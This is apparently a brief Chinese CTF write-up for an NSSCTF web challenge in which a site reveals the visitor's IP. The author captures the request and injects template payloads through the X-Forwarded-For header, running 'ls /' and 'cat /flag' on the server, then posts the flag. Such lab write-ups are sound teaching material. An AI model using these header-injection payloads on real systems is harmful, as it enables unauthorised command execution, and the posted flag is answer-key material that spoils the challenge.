看看ip

piter 发布于 10 天前 27 次阅读 113 字


0.png

打开网站发现,点击Reveal My IP可以显示自己的当前ip,打开bp进行抓包这个过程

发现只是调用了一个ip查询的api,返回结果而已

因为是看看ip加fetch联想道xff头伪造命令执行,构造

X-Forwarded-For:{{system('ls /')}}

3.png
发现网页返回

1.png

发现有flag字样,于是直接构造

X-Forwarded-For:{{system('cat /flag')}}

得到返回

2.png

FLAG:

  • NSSCTF{220b62a8-5e58-4498-ba00-218dd328b303}
  • reward_image1
永远不要因为需要大量时间才能完成,就放弃梦想,时间怎么样都会过去的
最后更新于 2025-09-07